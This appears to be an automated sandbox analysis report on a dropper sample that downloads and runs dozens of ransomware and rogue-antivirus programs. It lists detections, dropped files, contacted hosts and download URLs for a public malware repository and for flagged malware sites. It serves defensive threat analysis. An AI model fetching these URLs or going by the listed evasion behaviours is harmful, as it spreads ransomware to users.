          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 712613 Sample: bpkAAJptGv.exe Startdate: 29/09/2022 Architecture: WINDOWS Score: 100 135 yandex.ru 2->135 137 www.vikingwebscanner.com 2->137 139 9 other IPs or domains 2->139 157 Snort IDS alert for network traffic 2->157 159 Malicious sample detected (through community Yara rule) 2->159 161 Antivirus detection for URL or domain 2->161 163 16 other signatures 2->163 10 bpkAAJptGv.exe 14 72 2->10         started        15 svchost.exe 2->15         started        17 cmd.exe 2->17         started        19 8 other processes 2->19 signatures3 process4 dnsIp5 141 raw.githubusercontent.com 10->141 143 github.com 10->143 119 C:\Users\user\Desktop\Fantom.exe, PE32 10->119 dropped 121 C:\Users\user\Desktopndermanch@Xyeta.exe, PE32 10->121 dropped 123 C:\...ndermanch@WinlockerVB6Blacksod.exe, PE32 10->123 dropped 125 65 other malicious files 10->125 dropped 201 Writes many files with high entropy 10->201 21 Endermanch@BadRabbit.exe 10->21         started        25 Endermanch@AntivirusPlatinum.exe 1 13 10->25         started        27 Endermanch@Birele.exe 10->27         started        33 9 other processes 10->33 29 MpCmdRun.exe 15->29         started        31 conhost.exe 17->31         started        file6 signatures7 process8 dnsIp9 101 C:\Windows\infpub.dat, data 21->101 dropped 177 Antivirus detection for dropped file 21->177 179 Multi AV Scanner detection for dropped file 21->179 181 Machine Learning detection for dropped file 21->181 36 rundll32.exe 21->36         started        40 conhost.exe 21->40         started        103 C:\Windows\antivirus-platinum.exe, PE32 25->103 dropped 105 C:\Windows\302746537.exe, PE32 25->105 dropped 107 C:\Windows\MSCOMCTL.OCX, PE32 25->107 dropped 109 C:\Windows\COMCTL32.OCX, PE32 25->109 dropped 183 Drops executables to the windows directory (C:\Windows) and starts them 25->183 42 302746537.exe 25->42         started        185 Creates an undocumented autostart registry key 27->185 187 Creates multiple autostart registry keys 27->187 189 Deletes keys related to Windows Defender 27->189 191 Deletes keys which are related to windows safe boot (disables safe mode boot) 27->191 44 taskkill.exe 27->44         started        46 conhost.exe 29->46         started        129 93.107.12.20 VODAFONE-IRELAND-ASNIE Ireland 33->129 131 93.107.12.21 VODAFONE-IRELAND-ASNIE Ireland 33->131 133 104 other IPs or domains 33->133 111 C:\Users\user\...\ATJBEMHSSB.jpg.deria, COM 33->111 dropped 113 C:\Users\user\Desktop\ATJBEMHSSB.pdf.deria, DOS 33->113 dropped 115 C:\Users\user\AppData\Local\6AdwCleaner.exe, PE32 33->115 dropped 117 9 other files (7 malicious) 33->117 dropped 193 Uses netsh to modify the Windows network and firewall settings 33->193 195 Modifies the windows firewall 33->195 197 Disables security and backup related services 33->197 199 3 other signatures 33->199 48 6AdwCleaner.exe 33->48         started        51 netsh.exe 33->51         started        53 netsh.exe 33->53         started        55 5 other processes 33->55 file10 signatures11 process12 dnsIp13 95 C:\Windows\dispci.exe, PE32 36->95 dropped 97 C:\Windows\cscc.dat, PE32+ 36->97 dropped 99 C:\Windows\870F.tmp, data 36->99 dropped 165 System process connects to network (likely due to code injection or exploit) 36->165 167 Connects to many different private IPs via SMB (likely to spread or exploit) 36->167 169 Connects to many different private IPs (likely to spread or exploit) 36->169 175 5 other signatures 36->175 57 cmd.exe 36->57         started        59 cmd.exe 36->59         started        61 cmd.exe 36->61         started        63 870F.tmp 36->63         started        171 Multi AV Scanner detection for dropped file 42->171 65 cmd.exe 42->65         started        68 conhost.exe 44->68         started        127 www.vikingwebscanner.com 48->127 173 Antivirus detection for dropped file 48->173 70 conhost.exe 51->70         started        72 conhost.exe 53->72         started        74 3 other processes 55->74 file14 signatures15 process16 signatures17 76 conhost.exe 57->76         started        78 schtasks.exe 57->78         started        89 2 other processes 59->89 91 2 other processes 61->91 80 conhost.exe 63->80         started        145 Drops executables to the windows directory (C:\Windows) and starts them 65->145 147 Uses schtasks.exe or at.exe to add and modify task schedules 65->147 82 antivirus-platinum.exe 65->82         started        85 conhost.exe 65->85         started        87 regsvr32.exe 65->87         started        93 2 other processes 65->93 process18 signatures19 149 Multi AV Scanner detection for dropped file 82->149 151 Changes security center settings (notifications, updates, antivirus, firewall) 82->151 153 Disables the Windows task manager (taskmgr) 82->153 155 2 other signatures 82->155

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          bpkAAJptGv.exe54%ReversingLabsWin32.Trojan.Generic
          bpkAAJptGv.exe22%MetadefenderBrowse
          bpkAAJptGv.exe100%AviraTR/Dropper.Gen
          bpkAAJptGv.exe100%Joe Sandbox ML
          SourceDetectionScannerLabelLink
          C:\Users\user\Desktop\Endermanch@FakeAdwCleaner.exe100%AviraHEUR/AGEN.1224490
          C:\Users\user\Desktop\Endermanch@Cerber5.exe100%AviraHEUR/AGEN.1227089
          C:\Users\user\Desktop\Endermanch@AntivirusPro2017.exe100%AviraTR/AD.FakeRean.mwfxa
          C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe100%AviraDR/Pasta.kdx
          C:\Program Files (x86)\antiviruspc2009\avpc2009.exe100%AviraTR/Fake.avpc.94312
          C:\Users\user\Desktop\Endermanch@Antivirus.exe100%AviraTR/Dldr.FraudLoad.xerf
          C:\Users\user\AppData\Local\6AdwCleaner.exe100%AviraJOKE/Agent.rlham
          C:\Users\user\Desktop\Endermanch@AnViPC2009.exe100%AviraDR/Agent.aq.122610
          C:\Users\user\Desktop\Endermanch@Birele.exe100%AviraTR/BAS.Samca.fyzpg
          C:\Users\user\Desktop\Endermanch@DeriaLock.exe100%AviraTR/Genasom.wzara
          C:\Users\user\Desktop\Endermanch@HappyAntivirus.exe100%AviraPUA/HappyAV.A
          C:\Users\user\Desktop\Endermanch@BadRabbit.exe100%AviraTR/Diskcoder.ezxim
          C:\Users\user\Desktop\Endermanch@Cerber5.exe100%Joe Sandbox ML
          C:\Users\user\Desktop\Endermanch@AntivirusPro2017.exe100%Joe Sandbox ML
          C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe100%Joe Sandbox ML
          C:\Users\user\Desktop\Endermanch@Birele.exe100%Joe Sandbox ML
          C:\Users\user\Desktop\Endermanch@DeriaLock.exe100%Joe Sandbox ML
          C:\Users\user\Desktop\Endermanch@HappyAntivirus.exe100%Joe Sandbox ML
          C:\Users\user\Desktop\Endermanch@BadRabbit.exe100%Joe Sandbox ML
          C:\Program Files (x86)\antiviruspc2009\avpc2009.exe62%ReversingLabsWin32.Rogue.FakeRean
          C:\Program Files (x86)\antiviruspc2009\avpc2009.exe56%MetadefenderBrowse
          C:\Program Files (x86)\antiviruspc2009\bzip2.dll2%ReversingLabs
          C:\Program Files (x86)\antiviruspc2009\bzip2.dll4%MetadefenderBrowse
          C:\Program Files (x86)\antiviruspc2009\libltdl3.dll0%ReversingLabs
          C:\Program Files (x86)\antiviruspc2009\libltdl3.dll4%MetadefenderBrowse
          C:\Program Files (x86)\antiviruspc2009\pthreadVC2.dll0%ReversingLabs
          C:\Program Files (x86)\antiviruspc2009\pthreadVC2.dll4%MetadefenderBrowse
          C:\Users\user\AppData\Local\6AdwCleaner.exe60%ReversingLabsWin32.Rogue.Wadebooc
          C:\Users\user\AppData\Local\6AdwCleaner.exe52%MetadefenderBrowse
          C:\Users\user\Desktop\Endermanch@AnViPC2009.exe68%ReversingLabsWin32.Rogue.FakeRean
          C:\Users\user\Desktop\Endermanch@AnViPC2009.exe24%MetadefenderBrowse
          C:\Users\user\Desktop\Endermanch@Antivirus.exe86%ReversingLabsWin32.Trojan.CoreGuardAntivirus2009
          C:\Users\user\Desktop\Endermanch@Antivirus.exe60%MetadefenderBrowse
          C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe78%ReversingLabsWin32.Trojan.Pasta
          C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe28%MetadefenderBrowse
          C:\Users\user\Desktop\Endermanch@AntivirusPro2017.exe92%ReversingLabsWin32.Rogue.FakeRean
          C:\Users\user\Desktop\Endermanch@AntivirusPro2017.exe64%MetadefenderBrowse
          C:\Users\user\Desktop\Endermanch@BadRabbit.exe93%ReversingLabsWin32.Ransomware.BadRabbit
          C:\Users\user\Desktop\Endermanch@BadRabbit.exe83%MetadefenderBrowse
          C:\Users\user\Desktop\Endermanch@Birele.exe86%ReversingLabsWin32.Ransomware.Genasom
          C:\Users\user\Desktop\Endermanch@Birele.exe78%MetadefenderBrowse
          C:\Users\user\Desktop\Endermanch@Cerber5.exe91%ReversingLabsWin32.Ransomware.Cerber
          C:\Users\user\Desktop\Endermanch@Cerber5.exe76%MetadefenderBrowse
          C:\Users\user\Desktop\Endermanch@DeriaLock.exe92%ReversingLabsWin32.Ransomware.Derialock
          C:\Users\user\Desktop\Endermanch@DeriaLock.exe69%MetadefenderBrowse
          C:\Users\user\Desktop\Endermanch@FakeAdwCleaner.exe70%ReversingLabsWin32.Trojan.MintPorcupine
          C:\Users\user\Desktop\Endermanch@FakeAdwCleaner.exe60%MetadefenderBrowse
          C:\Users\user\Desktop\Endermanch@HappyAntivirus.exe37%ReversingLabsWin32.PUA.HappyAV
          C:\Users\user\Desktop\Endermanch@HappyAntivirus.exe36%MetadefenderBrowse
          C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe85%ReversingLabsByteCode-MSIL.Ransomware.Infinity
          C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe60%MetadefenderBrowse
          C:\Users\user\Desktop\Endermanch@InternetSecurityGuard.exe85%ReversingLabsWin32.Trojan.Simda
          C:\Users\user\Desktop\Endermanch@InternetSecurityGuard.exe64%MetadefenderBrowse
          C:\Users\user\Desktop\Endermanch@Krotten.exe96%ReversingLabsWin32.Trojan.Krotten
          C:\Users\user\Desktop\Endermanch@Krotten.exe86%MetadefenderBrowse
          C:\Users\user\Desktop\Endermanch@LPS2019.exe59%ReversingLabsByteCode-MSIL.Trojan.Dnoper
          C:\Users\user\Desktop\Endermanch@LPS2019.exe24%MetadefenderBrowse
          C:\Users\user\Desktop\Endermanch@Movie.mpeg.exe95%ReversingLabsWin32.Trojan.Razy
          C:\Users\user\Desktop\Endermanch@Movie.mpeg.exe80%MetadefenderBrowse
          C:\Users\user\Desktop\Endermanch@NavaShield.exe51%ReversingLabsWin32.Ransomware.Crypmod
          C:\Users\user\Desktop\Endermanch@NavaShield.exe20%MetadefenderBrowse
          C:\Users\user\Desktop\Endermanch@NoMoreRansom.exe91%ReversingLabsWin32.Ransomware.Troldesh
          C:\Users\user\Desktop\Endermanch@NoMoreRansom.exe72%MetadefenderBrowse
          C:\Users\user\Desktop\Endermanch@PCDefender.exe70%ReversingLabsWin32.Backdoor.Zapchast
          C:\Users\user\Desktop\Endermanch@PCDefender.exe28%MetadefenderBrowse
          C:\Users\user\Desktop\Endermanch@Petya.A.exe100%ReversingLabsWin32.Ransomware.Petya
          C:\Users\user\Desktop\Endermanch@Petya.A.exe84%MetadefenderBrowse
          C:\Users\user\Desktop\Endermanch@PolyRansom.exe95%ReversingLabsWin32.Ransomware.VirLock
          C:\Users\user\Desktop\Endermanch@PolyRansom.exe82%MetadefenderBrowse
          C:\Users\user\Desktop\Endermanch@RegistrySmart.exe35%ReversingLabsWin32.PUA.RegistryCleaner
          C:\Users\user\Desktop\Endermanch@RegistrySmart.exe20%MetadefenderBrowse
          C:\Users\user\Desktop\Endermanch@SE2011.exe93%ReversingLabsWin32.Rogue.CoreGuardAntivirus2009
          C:\Users\user\Desktop\Endermanch@SE2011.exe64%MetadefenderBrowse
          C:\Users\user\Desktop\Endermanch@SecurityCentral.exe88%ReversingLabsWin32.Rogue.FakeRean
          C:\Users\user\Desktop\Endermanch@SecurityCentral.exe80%MetadefenderBrowse
          C:\Users\user\Desktop\Endermanch@SecurityDefender.exe81%ReversingLabsWin32.Adware.AntimalwareDefender
          C:\Users\user\Desktop\Endermanch@SecurityDefender.exe56%MetadefenderBrowse
          C:\Users\user\Desktop\Endermanch@SecurityDefener2015.exe64%ReversingLabsWin32.Trojan.Graftor
          C:\Users\user\Desktop\Endermanch@SecurityDefener2015.exe56%MetadefenderBrowse
          C:\Users\user\Desktop\Endermanch@SecurityScanner.exe81%ReversingLabsWin32.Rogue.FakePAV
          C:\Users\user\Desktop\Endermanch@SecurityScanner.exe72%MetadefenderBrowse
          C:\Users\user\Desktop\Endermanch@SmartDefragmenter.exe86%ReversingLabsWin32.Trojan.FakeSysdef
          C:\Users\user\Desktop\Endermanch@SmartDefragmenter.exe72%MetadefenderBrowse
          C:\Users\user\Desktop\Endermanch@VAV2008.exe63%ReversingLabsWin32.Rogue.FakeSecSen
          C:\Users\user\Desktop\Endermanch@VAV2008.exe20%MetadefenderBrowse
          C:\Users\user\Desktop\Endermanch@ViraLock.exe95%ReversingLabsWin32.Ransomware.VirLock
          C:\Users\user\Desktop\Endermanch@ViraLock.exe83%MetadefenderBrowse
          C:\Users\user\Desktop\Endermanch@WannaCrypt0r.exe95%ReversingLabsWin32.Ransomware.WannaCry
          C:\Users\user\Desktop\Endermanch@WannaCrypt0r.exe88%MetadefenderBrowse
          C:\Users\user\Desktop\Endermanch@WinlockerVB6Blacksod.exe45%ReversingLabsWin32.Ransomware.InfinityLock
          C:\Users\user\Desktop\Endermanch@WinlockerVB6Blacksod.exe31%MetadefenderBrowse
          C:\Users\user\Desktop\Endermanch@Xyeta.exe92%ReversingLabsWin32.Downloader.Lofog
          C:\Users\user\Desktop\Endermanch@Xyeta.exe63%MetadefenderBrowse
          C:\Users\user\Desktop\Fantom.exe88%ReversingLabsByteCode-MSIL.Ransomware.Fantom
          C:\Users\user\Desktop\Fantom.exe66%MetadefenderBrowse
          C:\Windows\302746537.exe42%ReversingLabsWin32.Trojan.Generic
          C:\Windows\302746537.exe52%MetadefenderBrowse
          C:\Windows\COMCTL32.OCX0%ReversingLabs
          C:\Windows\COMCTL32.OCX4%MetadefenderBrowse
          C:\Windows\MSCOMCTL.OCX0%ReversingLabs
          SourceDetectionScannerLabelLinkDownload
          13.3.Endermanch@AntivirusPro2017.exe.2db0000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          23.0.Endermanch@Cerber5.exe.400000.3.unpack100%AviraHEUR/AGEN.1227089Download File
          11.0.Endermanch@Antivirus.exe.400000.0.unpack100%AviraTR/Dldr.FraudLoad.xerfDownload File
          16.0.Endermanch@BadRabbit.exe.1100000.1.unpack100%AviraTR/ATRAPS.GenDownload File
          23.0.Endermanch@Cerber5.exe.400000.1.unpack100%AviraHEUR/AGEN.1227089Download File
          15.0.302746537.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          17.0.Endermanch@Birele.exe.400000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          17.0.Endermanch@Birele.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          15.2.302746537.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          16.2.Endermanch@BadRabbit.exe.1100000.0.unpack100%AviraTR/ATRAPS.GenDownload File
          16.0.Endermanch@BadRabbit.exe.1100000.2.unpack100%AviraTR/ATRAPS.GenDownload File
          13.0.Endermanch@AntivirusPro2017.exe.400000.2.unpack100%AviraTR/AD.FakeRean.mwfxaDownload File
          17.0.Endermanch@Birele.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          11.0.Endermanch@Antivirus.exe.400000.3.unpack100%AviraTR/Dldr.FraudLoad.xerfDownload File
          41.0.avpc2009.exe.400000.0.unpack100%AviraTR/Fake.avpc.94312Download File
          13.0.Endermanch@AntivirusPro2017.exe.400000.0.unpack100%AviraTR/AD.FakeRean.mwfxaDownload File
          13.0.Endermanch@AntivirusPro2017.exe.400000.1.unpack100%AviraTR/AD.FakeRean.mwfxaDownload File
          11.0.Endermanch@Antivirus.exe.400000.1.unpack100%AviraTR/Dldr.FraudLoad.xerfDownload File
          41.0.avpc2009.exe.554540.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          23.0.Endermanch@Cerber5.exe.400000.0.unpack100%AviraHEUR/AGEN.1227089Download File
          20.2.rundll32.exe.4e20000.2.unpack100%AviraHEUR/AGEN.1234596Download File
          23.0.Endermanch@Cerber5.exe.400000.2.unpack100%AviraHEUR/AGEN.1227089Download File
          17.0.Endermanch@Birele.exe.400000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          49.0.antivirus-platinum.exe.400000.0.unpack100%AviraTR/Crypt.CFI.GenDownload File
          11.0.Endermanch@Antivirus.exe.400000.2.unpack100%AviraTR/Dldr.FraudLoad.xerfDownload File
          16.0.Endermanch@BadRabbit.exe.1100000.0.unpack100%AviraTR/ATRAPS.GenDownload File
          13.0.Endermanch@AntivirusPro2017.exe.400000.3.unpack100%AviraTR/AD.FakeRean.mwfxaDownload File
          16.0.Endermanch@BadRabbit.exe.1100000.3.unpack100%AviraTR/ATRAPS.GenDownload File
          No Antivirus matches
          SourceDetectionScannerLabelLink
          http://searchdusty.com/avt/avt.dat100%Avira URL Cloudmalware
          http://wallup.nethttp://wallup.nethttp://wallup.net0%Avira URL Cloudsafe
          https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/FakeAdwCleaner.zip0%Avira URL Cloudsafe
          https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/NoMoreRansom.zip0%Avira URL Cloudsafe
          https://dynamic.t0%URL Reputationsafe
          https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Winlocker.VB6.Blacksod.zip0%Avira URL Cloudsafe
          https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/PolyRansom.zip0%Avira URL Cloudsafe
          https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/Security%20Central.zip0%Avira URL Cloudsafe
          https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/PC%20Defender%20v2.zip0%Avira URL Cloudsafe
          https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/PC%20Defender.zip0%Avira URL Cloudsafe
          https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Krotten.zip0%Avira URL Cloudsafe
          https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/Security%20Defender%202015.zip0%Avira URL Cloudsafe
          https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/RegistrySmart.zip0%Avira URL Cloudsafe
          https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/Movie.mpeg.zip0%Avira URL Cloudsafe
          https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/VAV2008.zip0%Avira URL Cloudsafe
          https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Fantom.zip0%Avira URL Cloudsafe
          http://www.vikingwebscanner.com/scripts/paymore.php0%Avira URL Cloudsafe
          https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/Live%20Protection%20Suite%202019.zip0%Avira URL Cloudsafe
          http://www.vikingwebscanner.com/scripts/new_install.php?owner=0%Avira URL Cloudsafe
          http://www.bzip.orgDVarFileInfo$0%Avira URL Cloudsafe
          http://www.vikingwebscanner.com/scripts/new_install.php?owner=6AdwCleaner0%Avira URL Cloudsafe
          https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/NavaShield.zip0%Avira URL Cloudsafe
          https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/AnViPC2009.zip0%Avira URL Cloudsafe
          https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Petya.A.zip0%Avira URL Cloudsafe
          http://www.navashield.com/83886080Nava0%Avira URL Cloudsafe
          http://checkeds.com/customers/installer.php?pid=AVT_BASIC0%Avira URL Cloudsafe
          https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/Happy%20Antivirus.zip0%Avira URL Cloudsafe
          https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/WannaCrypt0r.zip0%Avira URL Cloudsafe
          http://searchdusty.com/avt/avt_db100%Avira URL Cloudmalware
          https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/DeriaLock.zip0%Avira URL Cloudsafe
          https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/InternetSecurityGuard.zip0%Avira URL Cloudsafe
          http://searchdusty.com/avt/avtr.dat100%Avira URL Cloudmalware
          http://www.vikingwebscanner.com/scripts/status.php?action=0%Avira URL Cloudsafe
          https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/Antivirus.zip0%Avira URL Cloudsafe
          https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/Security%20Defender.zip0%Avira URL Cloudsafe
          http://www.vikingwebscanner.com/succes/index.php#pictureBox1.Image0%Avira URL Cloudsafe
          http://poetry.rotten.com/lightning/0%Avira URL Cloudsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          yandex.ru
          5.255.255.80
          truefalse
            high
            github.com
            140.82.121.4
            truefalse
              high
              raw.githubusercontent.com
              185.199.110.133
              truefalse
                high
                www.vikingwebscanner.com
                185.53.177.53
                truefalse
                  high
                  google.ru
                  172.217.168.67
                  truefalse
                    high
                    arizonacode.bplaced.net
                    162.55.0.137
                    truefalse
                      high
                      searchdusty.com
                      37.187.79.168
                      truefalse
                        high
                        frequentwin.com
                        unknown
                        unknownfalse
                          high
                          highway-traffic.com
                          unknown
                          unknownfalse
                            high
                            fastsofgeld.com
                            unknown
                            unknownfalse
                              high
                              NameMaliciousAntivirus DetectionReputation
                              https://github.com/Endermanch/MalwareDatabase/raw/master/ransomwares/DeriaLock.zipfalse
                                high
                                https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/NoMoreRansom.zipfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/Antivirus%20Pro%202017.zipfalse
                                  high
                                  https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/Security%20Central.zipfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://github.com/Endermanch/MalwareDatabase/raw/master/ransomwares/Xyeta.zipfalse
                                    high
                                    https://github.com/Endermanch/MalwareDatabase/raw/master/ransomwares/ViraLock.zipfalse
                                      high
                                      http://searchdusty.com/avt/avt.dattrue
                                      • Avira URL Cloud: malware
                                      unknown
                                      https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/PolyRansom.zipfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/FakeAdwCleaner.zipfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Winlocker.VB6.Blacksod.zipfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/PC%20Defender.zipfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Krotten.zipfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/Security%20Defender%202015.zipfalse
                                        high
                                        https://github.com/Endermanch/MalwareDatabase/raw/master/ransomwares/Birele.zipfalse
                                          high
                                          https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/PC%20Defender%20v2.zipfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://yandex.ru/1001false
                                            high
                                            https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/Movie.mpeg.zipfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://google.ru/da69ebd6-6db-4dfd-92f8-75ac195546d7false
                                              high
                                              https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/Security%20Defender%202015.zipfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Fantom.zipfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/Antivirus%20Platinum.zipfalse
                                                high
                                                https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/SecurityScanner.zipfalse
                                                  high
                                                  https://github.com/Endermanch/MalwareDatabase/raw/master/ransomwares/Petya.A.zipfalse
                                                    high
                                                    https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/Live%20Protection%20Suite%202019.zipfalse
                                                      high
                                                      https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/Live%20Protection%20Suite%202019.zipfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/Happy%20Antivirus.zipfalse
                                                        high
                                                        https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/RegistrySmart.zipfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/VAV2008.zipfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.vikingwebscanner.com/scripts/new_install.php?owner=6AdwCleanertrue
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/AnViPC2009.zipfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Petya.A.zipfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/NavaShield.zipfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://github.com/Endermanch/MalwareDatabase/raw/master/ransomwares/Fantom.zipfalse
                                                          high
                                                          https://github.com/Endermanch/MalwareDatabase/raw/master/ransomwares/Winlocker.VB6.Blacksod.zipfalse
                                                            high
                                                            https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/Happy%20Antivirus.zipfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/WannaCrypt0r.zipfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://searchdusty.com/avt/avt_dbfalse
                                                            • Avira URL Cloud: malware
                                                            unknown
                                                            https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/InternetSecurityGuard.zipfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/DeriaLock.zipfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://google.com/false
                                                              high
                                                              https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/Security%20Defender.zipfalse
                                                                high
                                                                https://github.com/Endermanch/MalwareDatabase/raw/master/ransomwares/InfinityCrypt.zipfalse
                                                                  high
                                                                  https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/Security%20Defender.zipfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/Antivirus.zipfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/VAV2008.zipfalse
                                                                    high
                                                                    https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/Win7Recover.zipfalse
                                                                      high
                                                                      http://searchdusty.com/avt/avtr.datfalse
                                                                      • Avira URL Cloud: malware
                                                                      unknown
                                                                      https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/FakeAdwCleaner.zipfalse
                                                                        high
                                                                        https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/PC%20Defender%20v2.zipfalse
                                                                          high
                                                                          https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/Movie.mpeg.zipfalse
                                                                            high
                                                                            https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/AnViPC2009.zipfalse
                                                                              high
                                                                              NameSourceMaliciousAntivirus DetectionReputation
                                                                              https://dev.ditu.live.com/REST/v1/Routes/svchost.exe, 00000005.00000002.318099990.000001D18F43D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://sources.redhat.com/pthreads-win32/b%pthreadVC2.dll.14.drfalse
                                                                                  high
                                                                                  https://dev.ditu.live.com/REST/v1/Traffic/Incidents/svchost.exe, 00000005.00000002.318466883.000001D18F45C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.317496447.000001D18F45A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://t0.tiles.ditu.live.com/tiles/gensvchost.exe, 00000005.00000003.317394365.000001D18F448000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.318205613.000001D18F44E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://dev.virtualearth.net/REST/v1/Routes/Walkingsvchost.exe, 00000005.00000003.317466047.000001D18F462000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://www.torproject.org/downlo&#097;d/download-easy.html.enEndermanch@Cerber5.exe, 00000017.00000003.487431383.0000000005415000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://www.torproject.org/Endermanch@Cerber5.exe, 00000017.00000003.491861666.000000000540A000.00000004.00000800.00020000.00000000.sdmp, Endermanch@Cerber5.exe, 00000017.00000003.430982779.00000000053F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://www.youtube.comEndermanch@Cerber5.exe, 00000017.00000003.487431383.0000000005415000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
